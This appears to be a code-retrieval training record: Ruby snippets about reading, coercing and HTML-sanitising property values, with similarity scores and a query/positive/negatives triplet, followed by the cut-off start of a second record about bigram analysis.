"def transform_property_value(value)\n case value\n when /^0/\n # when it is a zero leading value like \"0777\" don't turn\n # it into a number (this is a mode flag)\n value\n when /^\\d+$/\n value.to_i\n when /(^(\\d+)(\\.)?(\\d+)?)|(^(\\d+)?(\\.)(\\d+))/\n value.to_f\n when /true/i\n true\n when /false/i\n false\n else\n value\n end\n end",
"def value\n to_type(@value)\n end",
"def get_property(name)\n $NEO_LOGGER.debug{\"get property '#{name}'\"}\n \n return nil if ! property?(name)\n value = @internal_node.get_property(name.to_s)\n if self.class.marshal?(name)\n Marshal.load(String.from_java_bytes(value))\n else\n value\n end\n end",
"def get_value\n read_attribute('text_value')\n end",
"def draw_property_value(html, value)\n if value.scalar?\n return html.h(value)\n elsif value.is_a?(HtmlOutput)\n return value.to_html(html)\n elsif value.is_a?(Tilia::Xml::XmlSerializable)\n # There's no default html output for this property, we're going\n # to output the actual xml serialization instead.\n xml = @server.xml.write('{DAV:}root', value, @server.base_uri)\n # removing first and last line, as they contain our root\n # element.\n xml = xml.split(\"\\n\")\n xml = xml[2, 2]\n return \"<pre>#{html.h(xml.join(\"\\n\"))}</pre>\"\n else\n return '<em>unknown</em>'\n end\n end",
"def value\n record.send(name).value\n end",
"def value\n self.send :\"#{_mapped_value_column}\"\n end",
"def get_property\n @xml = client.call(url).parsed_response.css('property').first\n @attributes.merge!(parse_xml_to_hash)\n end",
"def get_value name\n get name\n end",
"def __value(val)\n case val\n when Array\n # 4.1.1\n val.collect { |v| __value(v) }.join(',')\n when Hash\n # 4.1.1\n val.collect { |k, v| \"#{__property(k)}=#{__value(v)}\" }.sort.join(';')\n when true, false\n # 4.3.2\n val.to_s.upcase\n when Date\n # 4.3.4\n val.strftime('%Y%m%d')\n when Time\n # 4.3.5\n val.strftime('%Y%m%dT%H%M%S' + (val.utc? ? 'Z' : ''))\n else\n val.to_s\n end\n end",
"def normalize_scalar_property_value(value)\n return \"NaN\" if value.kind_of?(Float) && value.nan?\n\n case value\n when true, false, nil then value\n when ActiveSupport::Duration then value.to_i\n when Numeric then value\n when String then value.strip\n when Symbol then value.to_s.strip\n when Time then value.getutc.strftime(\"%Y-%m-%dT%H:%M:%S\")\n when IPAddr then value.to_s\n when FLOAT_INFINITY then \"+infinity\"\n when -FLOAT_INFINITY then \"-infinity\"\n when Array then\n out = value.map { |e| normalize_scalar_property_value(e) }\n out = :invalid_property_value if out.detect { |e| e == :invalid_property_value }\n out\n else :invalid_property_value\n end\n end",
"def get_value\n read_attribute('number_value')\n end",
"def value\n @value || ''\n end",
"def getter(attribute)\n willAccessValueForKey(attribute)\n value = send(\"primitive#{attribute.sub(/\\S/, &:upcase)}\")\n didAccessValueForKey(attribute)\n return value\n end",
"def value\n YAML::load(self[:value])\n end",
"def value\n YAML::load(self[:value])\n end",
"def property(name)\n get(\"/session/#{session_id}/element/#{element_id}/property/#{name}\").value\n end",
"def value\n `#{@el}.value`\n end",
"def transmogrified_value\n case param.field.options[:value_transmogrification]\n when :chronic\n Chronic.parse(value, :context => :past)\n when :chronic_date\n v = Chronic.parse(value, :context => :past)\n v ? v.to_date : nil\n when :upcase\n value.upcase\n when :downcase\n value.downcase\n else\n value\n end\n end",
"def transform_property_value(value)\n case value\n when /^0/\n # when it is a zero leading value like \"0777\" don't turn\n # it into a number (this is a mode flag)\n value\n when /^\\d+$/\n value.to_i\n when /(^(\\d+)(\\.)?(\\d+)?)|(^(\\d+)?(\\.)(\\d+))/\n value.to_f\n when /true/i\n true\n when /false/i\n false\n else\n value\n end\n end",
"def process_field_value(value)\r\n value\r\n end",
"def _property(p_name)\n __t_stringish(p_name)\n _jinja.properties[__attribute_key(p_name)]\n end",
"def get_value_from(message_field)\n return if message_field.nil?\n\n message_field.public_send(*field_value)\n end",
"def value(key)\n if self[key].present?\n self[key].class != ActiveSupport::TimeWithZone ? self[key] : self[key].to_f\n elsif self[:parameters].present? && self[:parameters][key].present?\n return self[:parameters][key]\n elsif self[:extras].present? && self[:extras][key].present?\n return self[:extras][key]\n else\n return \"\"\n end\n end"
] | [
"0.75339127",
"0.7162885",
"0.71099174",
"0.70154476",
"0.685727",
"0.67887443",
"0.6724902",
"0.66939205",
"0.66882795",
"0.667826",
"0.66344774",
"0.66299194",
"0.6599992",
"0.6543717",
"0.64816314",
"0.64649594",
"0.6449784",
"0.64259946",
"0.6421008",
"0.6410926",
"0.6410926",
"0.6386912",
"0.6373667",
"0.63613725",
"0.63599634",
"0.63556623",
"0.63243145",
"0.6312526",
"0.6302927",
"0.6268681",
"0.62682235",
"0.6266577",
"0.6266577",
"0.62570333",
"0.6236405",
"0.61907846",
"0.61847293",
"0.61785424",
"0.6169909",
"0.61609614",
"0.6150107",
"0.61319196",
"0.61240804",
"0.6118758",
"0.6081182",
"0.6079602",
"0.607641",
"0.60684127",
"0.60684127",
"0.60684127",
"0.605219",
"0.605219",
"0.6051788",
"0.6051788",
"0.6051788",
"0.6051788",
"0.6051788",
"0.6051788",
"0.6051788",
"0.60354036",
"0.60326517",
"0.60249734",
"0.6010879",
"0.60034233",
"0.5983072",
"0.5983043",
"0.59821606",
"0.59812874",
"0.597666",
"0.59727526",
"0.59669155",
"0.59572625",
"0.595708",
"0.5947796",
"0.59469056",
"0.5943114",
"0.59406716",
"0.59389585",
"0.5937266",
"0.59251165",
"0.5924335",
"0.5920796",
"0.5913221",
"0.58872056",
"0.5886505",
"0.5885968",
"0.58817035",
"0.58812946",
"0.58787566",
"0.5876831",
"0.5875537",
"0.5875537",
"0.5869977",
"0.5865699",
"0.5857425",
"0.58498996",
"0.5834551",
"0.58339036",
"0.5821632",
"0.58181846"
] | 0.68610126 | 4 |
Removes HTML markup from property values | def transform(value, is_url: false)
if is_url
# Remove HTML-escaped encodings from URLs without full HTML-stripping
CGI.unescape_html(value)
elsif STRIP_HTML
# Strip HTML preserving block-level whitespace
# - Loofah seems to preserve & " etc. so we remove these with
# CGI.unescape_html
text = CGI.unescape_html(Loofah.fragment(value).to_text)
# Collapse all runs of whitespace to a single space
text.gsub!(/\s+/, ' ')
# Remove leading and trailing whitespace
text.strip!
# Return the transformed text
text
else
# Return value as-is
value
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def draw_property_value(html, value)\n if value.scalar?\n return html.h(value)\n elsif value.is_a?(HtmlOutput)\n return value.to_html(html)\n elsif value.is_a?(Tilia::Xml::XmlSerializable)\n # There's no default html output for this property, we're going\n # to output the actual xml serialization instead.\n xml = @server.xml.write('{DAV:}root', value, @server.base_uri)\n # removing first and last line, as they contain our root\n # element.\n xml = xml.split(\"\\n\")\n xml = xml[2, 2]\n return \"<pre>#{html.h(xml.join(\"\\n\"))}</pre>\"\n else\n return '<em>unknown</em>'\n end\n end",
"def html_safe_value\n sanitize(@values.join(' '), tags: %w[sub sup i em])\n end",
"def transform_property_value(value, value_type = nil, is_url: false)\n if is_url\n # Remove HTML-escaped encodings from URLs but avoid full HTML-stripping\n CGI.unescape_html(value)\n elsif STRIP_HTML\n # Strip HTML preserving block-level whitespace\n # - Loofah seems to preserve & " etc. so we remove these with CGI.unescape_html\n text = CGI.unescape_html(Loofah.fragment(value).to_text)\n # Collapse all runs of whitespace to a single space\n text.gsub!(/\\s+/, ' ')\n # Remove leading and trailing whitespace\n text.strip!\n # Return the transformed text\n text\n else\n # Return value as-is\n value\n end\n end",
"def value_html\n options[:catalog] ? '' : attribute_value_to_html(Array.wrap(values).first)\n end",
"def to_html\n map { |key, value|\n if value.is_a?(Hash)\n value.map { |k,v| %(#{key_to_attr_name(key)}-#{attribute_html(k, v)}) }.join(' ')\n else\n attribute_html(key, value)\n end\n }.join(' ')\n end",
"def strip_tags\n %w(name description allowed_values).each do |a|\n next if send(a).blank?\n self.send \"#{a}=\", send(a).gsub(/\\<.*?\\>/, '')\n end\n true\n end",
"def strip_tags\n %w(name description allowed_values).each do |a|\n next if send(a).blank?\n self.send \"#{a}=\", send(a).gsub(/\\<.*?\\>/, '')\n end\n true\n end",
"def strip_tags\n %w(name description allowed_values).each do |a|\n next if send(a).blank?\n self.send \"#{a}=\", send(a).gsub(/\\<.*?\\>/, '')\n end\n true\n end",
"def strip_html_from_description\n self.description = ActionView::Base.full_sanitizer.sanitize(description)\n end",
"def remove_alt_text(value)\n @children['alt-text'][:value].delete(value)\n end",
"def page_meta_escape_value(val)\n val.to_s.gsub(\"<\", \"<\").gsub(\">\", \">\")\n end",
"def set_NoHTML(value)\n set_input(\"NoHTML\", value)\n end",
"def clean_attribute(val)\n val.to_s.delete(\"\\n\").gsub(' ', '%20')\n end",
"def html\n value['Html']\n end",
"def sanitize_inputs\n attributes.each do |attr_name, attr_value|\n next unless attr_value.is_a? String\n self[attr_name] = strip_markup attr_value\n end\n end",
"def sanitize_product!(product)\n product.cms_text = sanitize_html(product.cms_text)\n product.description = sanitize_html(product.description)\n product.product_properties.each do |pp|\n pp.value = sanitize_html(pp.value)\n end unless product.product_properties.nil?\n end",
"def to_html(html)\n tmp = value.map do |value|\n html.h(value)\n end\n tmp.join(', ')\n end",
"def h obj; obj.to_s.html_escape end",
"def display_property_details(separator = '<br/>')\n property_details.join(separator)\n end",
"def transform_attr(key, value)\n if value.is_a? Array\n sub_attrs = value.map do |sub_prop|\n sub_prop.map { |k, v| transform_attr(k, v) }\n end\n \"<w:#{key}>#{sub_attrs.join}</w:#{key}>\"\n elsif value.is_a? Hash\n props = value.map { |k, v| format('w:%s=\"%s\"', k, v) if v }\n \"<w:#{key} #{props.compact.join(' ')} />\"\n else\n value = format('w:val=\"%s\" ', value) if value\n \"<w:#{key} #{value}/>\"\n end\n end",
"def transform_attr(key, value)\n if value.is_a? Array\n sub_attrs = value.map do |sub_prop|\n sub_prop.map { |k, v| transform_attr(k, v) }\n end\n \"<w:#{key}>#{sub_attrs.join}</w:#{key}>\"\n elsif value.is_a? Hash\n props = value.map { |k, v| format('w:%s=\"%s\"', k, v) if v }\n \"<w:#{key} #{props.compact.join(' ')} />\"\n else\n value = format('w:val=\"%s\" ', value) if value\n \"<w:#{key} #{value}/>\"\n end\n end",
"def display_property_details(separator = '<br/>')\n property_details.join(separator)\n end",
"def html_value\n \"TODO: html_value for #{name}\"\n end",
"def html_safe\n self\n end",
"def markup\n if tag?\n @value.raw\n elsif @value.instance_variable_defined?(:@markup)\n @value.instance_variable_get(:@markup)\n end\n end",
"def to_xhtml()\n nil\n end",
"def share_description(value) \n raw(value).gsub(\"<br>\", \" \").gsub(\"<br />\", \" \")\n end",
"def share_description(value)\n raw(value).gsub(\"<br>\", \" \").gsub(\"<br />\", \" \")\n end",
"def sanitize_attributes\n %w(author title description keyword).each do |field|\n self.send(\"#{field}=\",HTMLEntities.new.decode(self.send(field)))\n end\n end",
"def format_value(value)\n value.is_a?(String) ? value.gsub(\"\\u0000\", '') : value\n end",
"def clean_content\n self.content = content.gsub('<p> </p>', '') if content\n end",
"def to_html\n __html__.dup.scrub!(:escape).to_html\n end",
"def to_html(html)\n tmp = value.map do |value|\n html.xml_name(value)\n end\n tmp.join(', ')\n end",
"def show_val(value,\n str_if_empty='____',\n value_style='form_data',\n prefix='',\n suffix='',\n prefix_style='field_label')\n value_style = 'form_data' if value_style.blank?\n isblank = value.blank?\n if isblank && str_if_empty=='suppress'\n return ''\n end\n value = str_if_empty if isblank\n s = ''\n s << \"<span class='#{prefix_style}'>\" + prefix + \"</span>\" unless prefix.blank?\n s << \"<span class='#{value_style}'>#{value}</span>\"\n if (!isblank) && (!suffix.blank?) && (suffix != value.to_s[-1,1])\n s << suffix\t#\tAppend suffix if it not already the last character in the string (e.g., avoids double periods)\n end\n return s.html_safe\n end",
"def strip_html_tags!\n @raw.gsub!(/<[^>]+?>/, ' ')\n end",
"def attribute_value_to_html(value)\n ::Deepblue::LoggingHelper.bold_debug [ ::Deepblue::LoggingHelper.here,\n ::Deepblue::LoggingHelper.called_from,\n \"value=#{value}\",\n \"\" ] if doi_attribute_renderer_debug_verbose\n rv = ::Deepblue::DoiBehavior.doi_render value\n return rv\n end",
"def prop(field, name)\n value = nil\n unless field.nil?\n value = value_by_key(field, name)\n value = value&.html_safe if value.is_a?(String)\n end\n value\n end",
"def reverse_html_tags\n self.gsub('<', \"<\").gsub('>', \">\")\n end",
"def to_html(_options = {})\n ''\n end",
"def plain_html\n self.class.to_html.to_html(text.dup)\n end",
"def interpolated_markup\n visualization.markup.tap do |markup|\n interpolation_values.each do |k,v|\n markup.gsub!(\"__#{k.upcase}__\", v.to_s)\n end\n end\n end",
"def indicate_when_missing(value = nil) \n value.blank? ? \"—\" : value\n end",
"def textilize_without_paragraph(do_object_links=false)\n textilize(do_object_links).sub(/\\A<p[^>]*>(.*?)<\\/p>.*/m, '\\\\1')\n end",
"def html(cell_value)\n apply_format(cell_value, format, option).to_s\n end",
"def sanitize\n # ui_enabled only for the belongs_to, has_many and many_to_many types\n self.ui_enabled = nil unless self.is_relationship?\n\n # text_formatting only for the text type\n self.text_formatting = nil unless self.type == :text\n end",
"def to_html\n map { |x| x.output(\"\") }.join\n end",
"def purge_custom_tags(options)\n options.reject{ |key,value| [:label, :html, :field, :field_type, :separator].include?(key.to_sym) }\n end",
"def c(value)\n\tc_value = value.gsub(\"\\n\\n\",\"<paragraph></paragraph>\")\n\tc_value = c_value.gsub(\"`\",\"'\")\n\treturn c_value\nend",
"def method_missing(*attributes)\n if (attributes[0][/_safe$/])\n html_safe_string = send(attributes[0].to_s.gsub(/_safe$/,\"\").intern).html_safe\n CGI::unescapeElement( CGI::escapeHTML(html_safe_string), \"BR\" )\n else\n super\n end\n end",
"def process_property\n property.strip!\n value.strip!\n\n self.value = Regexp.last_match(1) if value =~ %r{\\A\"(.*)(?<!\\\\)\"\\z}m\n\n section[property] = typecast(value)\n\n self.property = nil\n self.value = nil\n end",
"def clean_value\n if (type == :string || type == :text) && !Axlsx.trust_input\n Axlsx.sanitize(::CGI.escapeHTML(@value.to_s))\n else\n @value.to_s\n end\n end",
"def dumpAsString\n\t\tmarkup = \"\"\n\t\t@Value.each do |line|\n\t\t\tmarkup += \"#{line}<br />\\n\"\n\t\tend\n\t\treturn markup\n\tend",
"def to_s\n return content unless node?\n props = properties || {}\n html = props.collect{ |key, value| '%s=\"%s\"' % [key, value] }\n attrs = \"\" \n attrs = (\" \" << html.join(\" \")) unless html.empty?\n \n if SELF_CLOSING_TAGS.include?(node)\n return \"\" unless attrs.strip.blank?\n \"<%s%s />\" % [node, attrs]\n else\n \"<%s%s>%s</%s>\" % [node, attrs, content, node]\n end\n end",
"def to_html\n diff(@old, @new, @fields).reduce({}) do |diffed_output, (key, val)|\n if val.class == Hash\n diffed_output[key] = val.reduce({}) do |d_o, (k, v)|\n d_o[k] = v.to_s :html\n d_o\n end\n else\n diffed_output[key] = val.to_s :html\n end\n diffed_output\n end\n end",
"def formatted_value_string(value)\n return value unless value.to_s.include?(\"\\n\") || value.to_s.include?(\"\\302\")\n\n # replaces all of \\n with a break line, but make sure it is escaped before marking as safe\n value = ERB::Util.html_escape(value)\n value.gsub!(\"\\n\", '<br>')\n value.html_safe # rubocop:disable Rails/OutputSafety\n end",
"def sanitize_attributes\n # Summary, content are sanitized with an HTML sanitizer, we want imgs etc to be present.\n # Other attributes are sanitized by stripping tags, they should be plain text.\n self.content = Sanitizer.sanitize_html self.content\n self.summary = Sanitizer.sanitize_html self.summary\n\n self.title = Sanitizer.sanitize_plaintext self.title\n self.author = Sanitizer.sanitize_plaintext self.author\n self.guid = Sanitizer.sanitize_plaintext self.guid\n self.url = Sanitizer.sanitize_plaintext self.url\n end",
"def strip_html(param_string)\n param_string.gsub!('<', '<')\n param_string.gsub!('>', '>')\n param_string.gsub(/\\\"/,\""\")\n return param_string\n end",
"def html_attributes(attr)\n return '' if attr.empty?\n\n attr.map do |k, v|\n v.nil? || (k == 'id' && v.strip.empty?) ? '' : \" #{k}=\\\"#{escape_html(v.to_s, :attribute)}\\\"\"\n end.join('')\n end",
"def html_value\n result = value.sub /^CL\\:/, '<b>Classifiers:</b> '\n result.gsub /\\[\\[(.*?)\\]\\]/ do |reference|\n values = $1\n pinyin = (values =~ /\\<.*\\>/) ? values.split('<')[1].sub('>', '') : ''\n values = values.sub(\"<#{pinyin}>\", '').split('|')\n traditional, simplified = values.count == 2 ? values : ['', values[0]]\n \"<span class='definition_link'><a href='/dictionary/find?simplified=#{simplified}&traditional=#{traditional}&pinyin=#{pinyin}'>#{simplified}#{'('+pinyin+')' if pinyin}</a></span>\"\n end\n end",
"def as_displayed\n strip_html.unescape_html.strip_squeeze\n end",
"def textilize_without_paragraph(do_object_links=false, sanitize=true)\n textilize(do_object_links, sanitize).sub(/\\A<p[^>]*>(.*?)<\\/p>.*/m, '\\\\1')\n end",
"def process\n @properties.map { |k, v| transform_attr(k, v) }.join\n end",
"def process\n @properties.map { |k, v| transform_attr(k, v) }.join\n end",
"def html_escape\n return to_s\n end",
"def html_escape\n return to_s\n end",
"def to_propertyfile_escaped_s\n to_s.to_propertyfile_escaped_s\n end",
"def to_propertyfile_escaped_s\n to_s.to_propertyfile_escaped_s\n end",
"def to_s(attributes = nil)\r\n assert_exists\r\n hash_properties = {\"text\"=>\"innerHTML\"}\r\n hash_properties.update(attributes) if attributes != nil\r\n r = super(hash_properties)\r\n #r = string_creator\r\n #r += span_div_string_creator\r\n return r.join(\"\\n\")\r\n end",
"def clean_field(value)\n doc = Nokogiri::XML.fragment(value)\n doc.text.squish\n end",
"def to_s\n if revealed?\n value.to_s\n else\n \" \"\n end\n end",
"def remove_whitespace\n self.attributes.each { |key, value| self[key] = value.strip if value.respond_to?(:strip) }\n end",
"def html_attributes(attr); end",
"def html_attributify\n downcase.gsub(/[_\\/\\s]/, \"-\").gsub(/[^0-9a-z\\-]+/, \"\")\n end",
"def orphan str\n \"#{tagify(:p, {}, str.to_s.strip)}\"\n end",
"def sanitize_details\n self.details = ActionController::Base.helpers.sanitize(details, { :tags => ALLOWED_HTML_TAGS_IN_DETAILS } )\n end",
"def sanitize_css_declaration_value(property, value)\n clean = \"\"\n property.downcase!\n if property == \"font-family\"\n if !sanitize_css_font(value).blank?\n # preserve the original capitalization\n clean = value\n end\n elsif property == \"content\"\n clean = sanitize_css_content(value)\n elsif value.match(/\\burl\\b/) && (!ArchiveConfig.SUPPORTED_CSS_KEYWORDS.include?(\"url\") || !%w(background background-image border border-image list-style list-style-image).include?(property))\n # check whether we can use urls in this property\n clean = \"\"\n elsif property.match(/#{ArchiveConfig.SUPPORTED_CSS_SHORTHAND_PROPERTIES.join('|')}/)\n clean = tokenize_and_sanitize_css_value(value)\n elsif ArchiveConfig.SUPPORTED_CSS_PROPERTIES.include?(property)\n clean = sanitize_css_value(value)\n end\n clean.strip\n end",
"def sanitize_metadata\n return unless metadata_changed?\n sanitizers = {\n 'title' => [:html_entities],\n 'notes' => [:html, :css],\n 'endnotes' => [:html, :css],\n 'summary' => [:html]\n }\n sanitizers.each do |field, sanitizers|\n value = metadata[field]\n next if value.blank?\n self.metadata[field] = sanitized_value(value, sanitizers)\n end\n sanitize_associations\n end",
"def evaporate\n self.gsub(/\\s/, '')\n end",
"def inline_html(opts)\n opts[:text] || \"\"\n end",
"def default_input_html; {} end",
"def to_html; end",
"def escape_html_fields\n @entity_config.each do |key, entity_config|\n entity_val = @params[key.to_sym]\n next if entity_val.blank?\n r = escape_html_fields_recursively(entity_val, entity_config)\n @params[:form_data][key.to_sym] = r\n @params.delete(key)\n end\n end",
"def escape_html(value)\n CGI.escapeHTML(value)\n end",
"def markup\n self.text.sub(/^(.*)$/,'<b>\\1</b>')\n end",
"def xml_attr_escape\n replacements = {\"<\" => \"<\", \">\" => \">\", \"&\" => \"&\", \"\\\"\" => \""\", \"'\" => \"'\"}\n gsub(/([<>&\\'\\\"])/) { replacements[$1] }\n end",
"def sanitize_as_html!\n Engine.clean!(self)\n end",
"def sanitize_as_html!\n Engine.clean!(self)\n end",
"def proptext(name) #:nodoc:\n prop = @properties.detect { |f| f.name? name }\n if prop\n prop = prop.to_text\n end\n prop\n end",
"def text\n html.gsub(REGEX_TAGS, \"\")\n end",
"def unstarred\n '☆'\n end",
"def sanitize_data(value)\n HtmlSanitizer.sanitize(value)\n end",
"def cleanup_newlines\n [:description, :use].each do |field|\n self[field].gsub!(/\\r\\n/, \"\\n\") if self[field]\n end\n end",
"def sanitize(text)\n text.gsub('<', '<').gsub('>', '>')\n end",
"def no_tags label\n return label.gsub(/\\<.+\\/?\\>/,'')\n end",
"def to_html(options = {})\n \"\"\n end",
"def populate_properties_from(element)\n self.class.properties.each do |p|\n if element.has_element?(p)\n val = element.element(p).value\n unless val.nil? \n val = val.to_s.to_created_time if self.class.timestamps.include? p\n val = val.to_s.strip_html if p.to_s == 'source' && !val.to_s.empty?\n unless block_given? && p.to_s == 'text'\n val = HttpUtility.html_decode val if p.to_s == 'text'\n self.send(\"#{p}=\".to_sym, val) \n else\n yield val\n end\n end\n end\n end\n end",
"def render_value(value)\n value.kind_of?(Class) ? value.inspect : value\n end",
"def to_html\n #FIXME refactor with to_s\n out = ''\n self.metadata.each{|k,v| out << \"<p>\\n<b>#{k}</b>: #{v}\\n</p>\\n\"}\n out << \"--------------------\\n\"\n self.steps.each{|s| out << s.to_html }\n out\n end",
"def _(data=\"\"); self.__ self.escape_html(data.to_s); end",
"def tag_attributes(options)\n return '' unless options\n options.inject('') do |all,(key,value)|\n next all unless value\n all << ' ' if all.empty?\n all << if value.is_a?(Hash)\n nested_values(key, value)\n elsif BOOLEAN_ATTRIBUTES.include?(key)\n %(#{key}=\"#{key}\" )\n else\n %(#{key}=\"#{escape_value(value)}\" )\n end\n end.chomp!(' ')\n end",
"def to_xhtml(options = T.unsafe(nil)); end"
] | [
"0.65004545",
"0.6416042",
"0.62413484",
"0.6210583",
"0.6144749",
"0.5946043",
"0.5946043",
"0.5946043",
"0.590286",
"0.58979213",
"0.5865639",
"0.5843693",
"0.5795531",
"0.5794074",
"0.5786897",
"0.5749199",
"0.5747145",
"0.5703195",
"0.5694222",
"0.5691464",
"0.5691464",
"0.56615114",
"0.56614107",
"0.5634138",
"0.56003827",
"0.55944204",
"0.5581133",
"0.5563171",
"0.55595833",
"0.5532139",
"0.5523721",
"0.5514901",
"0.5512192",
"0.54859114",
"0.5449333",
"0.5447177",
"0.54388696",
"0.5437364",
"0.54246706",
"0.5409716",
"0.5404774",
"0.5400512",
"0.53968036",
"0.5390916",
"0.5385529",
"0.5379714",
"0.5369833",
"0.5365538",
"0.5357942",
"0.53541493",
"0.535275",
"0.534738",
"0.53423893",
"0.534182",
"0.53412354",
"0.5336385",
"0.5324742",
"0.5324329",
"0.5323311",
"0.53205985",
"0.5319649",
"0.5313727",
"0.5313727",
"0.53134054",
"0.53134054",
"0.53073263",
"0.53073263",
"0.5305068",
"0.53016484",
"0.5288735",
"0.5286145",
"0.5283567",
"0.5282695",
"0.5282319",
"0.52793616",
"0.5278602",
"0.52726513",
"0.52701056",
"0.52672356",
"0.5264436",
"0.5261678",
"0.5259808",
"0.5234852",
"0.52330184",
"0.52328926",
"0.52321607",
"0.52321607",
"0.523208",
"0.52261597",
"0.5214336",
"0.5203293",
"0.5202386",
"0.5196128",
"0.5191743",
"0.51723766",
"0.516568",
"0.5163488",
"0.5163024",
"0.51598185",
"0.5157768",
"0.5154209"
] | 0.0 | -1 |
Initialize Bigram analysis instance. analysis The main Analysis instance. | def initialize(directory)
@directory = directory
@table = {}
@index = Hash.new{ |h,k| h[k] = [] }
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def initialize(*args)\n super\n\n # Save parameters\n if focal_word\n self.focal_word = focal_word.mb_chars.downcase.to_s\n self.focal_word_stem = focal_word.stem\n end\n\n # Extract the stop list if provided\n self.stop_words = []\n if language\n self.stop_words = RLetters::Analysis::StopList.for(language)\n end\n\n # Clear final attributes\n self.nodes = []\n self.edges = []\n\n # Run the analysis for each of the gaps\n gaps.each_with_index do |g, i|\n add_nodes_for_gap(g)\n progress&.call((i + 1).to_f / gaps.size.to_f * 100.0)\n end\n\n # Final progress tick\n progress&.call(100)\n end",
"def initialize(report)\n @predictions = []\n @genscan_version = nil\n @date_run = nil\n @time = nil\n @query_name = nil\n @length = nil\n @gccontent = nil\n @isochore = nil\n @matrix = nil\n\n report.each(\"\\n\") do |line|\n case line\n when /^GENSCAN/\n parse_headline(line)\n when /^Sequence/\n parse_sequence(line)\n when /^Parameter/\n parse_parameter(line)\n when /^Predicted genes/\n break\n end\n end\n\n # rests\n i = report.index(/^Predicted gene/)\n j = report.index(/^Predicted peptide sequence/)\n\n # genes/exons\n genes_region = report[i...j]\n genes_region.each(\"\\n\") do |line|\n if /Init|Intr|Term|PlyA|Prom|Sngl/ =~ line\n gn, en = line.strip.split(\" +\")[0].split(/\\./).map {|i| i.to_i }\n add_exon(gn, en, line)\n end\n end\n\n # sequences (peptide|CDS)\n sequence_region = report[j...report.size]\n sequence_region.gsub!(/^Predicted .+?:/, '')\n sequence_region.gsub!(/^\\s*$/, '')\n sequence_region.split(Bio::FastaFormat::RS).each do |ff|\n add_seq(Bio::FastaFormat.new(ff))\n end\n end",
"def prepare_analyzer num_samples\n show do\n title \"Open QiAxcel\"\n note \"Once you are running this job on the Fragment Analyzer computer, open the QiAxcel software from the windows dockbar.\"\n note \"The next steps are to be performed in the QiAxcel software.\"\n end\n \n show do \n title \"Prepare Fragment Analyzer\"\n note \"Click \\\"Back to Wizard\\\" if previous data is displayed.\"\n check \"Under \\\"Process\\\" -> \\\"Process Profile\\\", make sure \\\"PhusionPCR\\\" is selected.\"\n \n check \"Under \\\"Marker\\\", in the \\\"Reference Marker\\\" drop-down, select \\\"15bp_5kb_022216\\\". A green dot should appear to the right of the drop-down.\"\n \n check \"Under \\\"Sample selection\\\", deselect all rows but the first #{(num_samples / ANALYZER_COLUMNS.to_f).ceil}.\"\n \n note \"Perform final check before running analysis\"\n note \"Under \\\"Run Check\\\", manually confirm the following:\"\n check \"Selected rows contain samples.\"\n check \"Alignment marker is loaded (changed every few weeks).\"\n end\n end",
"def initialize\n @analyzers = []\n end",
"def new\n @gram = Gram.new\n end",
"def analyzers\n onegram_analyzer = Frequency.call(\n dataset: dataset,\n progress: ->(p) { progress&.call((p.to_f / 100 * 33).to_i) }\n )\n\n # The bigrams should only include the focal word, if the user has\n # restricted the analysis\n bigram_analyzer = Frequency.call(\n dataset: dataset,\n ngrams: 2,\n inclusion_list: focal_word,\n num_blocks: 1,\n split_across: true,\n progress: ->(p) { progress&.call((p.to_f / 100 * 33).to_i + 33) }\n )\n\n [onegram_analyzer, bigram_analyzer]\n end",
"def analyze\n @analysis = Analysis.new(directory)\n @analysis.scan\n #@analysis.save!\n end",
"def runAnalyzer(num_samples,inhash)\n # select profile for run\n show do \n title \"Select #{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]}\" # this is just a profile name, should be ok for other polymerases\n note \"Click <b>Back to Wizard</b> if previous data is displayed.\"\n check \"Under <b>Process -> Process Profile</b>, make sure <b>#{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]}</b> is selected.\"\n end\n \n # select alignment marker\n ref_marker = (inhash[:sampleTypes] == 'DNA') ? REF_MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]] : REF_MARKERS[inhash[:type_ind] ]\n show do \n title \"Select alignment marker\"\n check \"Under <b>Marker</b>, in the <b>Reference Marker </b> drop-down, select <b>#{ref_marker}</b>. A green dot should appear to the right of the drop-down.\"\n end\n \n # empty rows\n if inhash[:sampleTypes] == 'RNA'\n num_samples = num_samples + 1 # Include the ladder in the first well of the first stripwell\n nonempty_rows = (num_samples/WELLS_PER_STRIPWELL.to_f).ceil\n (num_samples % WELLS_PER_STRIPWELL) > 0 ? nonempty_rows + 1 : nonempty_rows\n else\n nonempty_rows = (num_samples/WELLS_PER_STRIPWELL.to_f).ceil\n end\n show do \n title \"Deselect empty rows\"\n check \"Under <b>Sample selection</b>, deselect all rows but the first #{nonempty_rows}.\"\n end\n \n # check \n show do \n title \"Perform final check before running analysis\"\n note \"Under <b>Run Check</b>, manually confirm the following:\"\n check \"Selected rows contain samples.\"\n check \"Alignment marker is loaded (changed every few weeks).\"\n end\n \n # run and ask tech for remaining number of runs\n run_data = show do \n title \"Run analysis\"\n note \"If you can't click <b>Run</b>, and there is an error that reads <b>The pressure is too low. Replace the nitrogen cylinder or check the external nitrogen source</b>, close the software, and reopen it. Then restart at title - <b>Select #{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]} </b>\"\n check \"Otherwise, click <b>Run</b>\"\n note \"Estimated time of experiment is given at the bottom of the screen\"\n get \"number\", var: \"runs_left\", label: \"Enter the number of <b>Remaining Runs</b> left in this cartridge\", default: 0\n #image \"frag_an_run\"\n end\n \n # return\n run_data[:runs_left]\n \n end",
"def initialize(*args)\n @initial_categories = []\n options = { language: 'en',\n enable_threshold: false,\n threshold: 0.0,\n enable_stemmer: true,\n backend: BayesMemoryBackend.new\n }\n args.flatten.each do |arg|\n if arg.is_a?(Hash)\n options.merge!(arg)\n else\n @initial_categories.push(arg)\n end\n end\n\n unless options.key?(:auto_categorize)\n options[:auto_categorize] = @initial_categories.empty? ? true : false\n end\n\n @language = options[:language]\n @auto_categorize = options[:auto_categorize]\n @enable_threshold = options[:enable_threshold]\n @threshold = options[:threshold]\n @enable_stemmer = options[:enable_stemmer]\n @backend = options[:backend]\n\n populate_initial_categories\n\n if options.key?(:stopwords)\n custom_stopwords options[:stopwords]\n end\n end",
"def initialize programa\n\t\t@tk = []\n\t\t@error = []\n\t\t@parserTk = []\n\t\tlexer(programa)\n\tend",
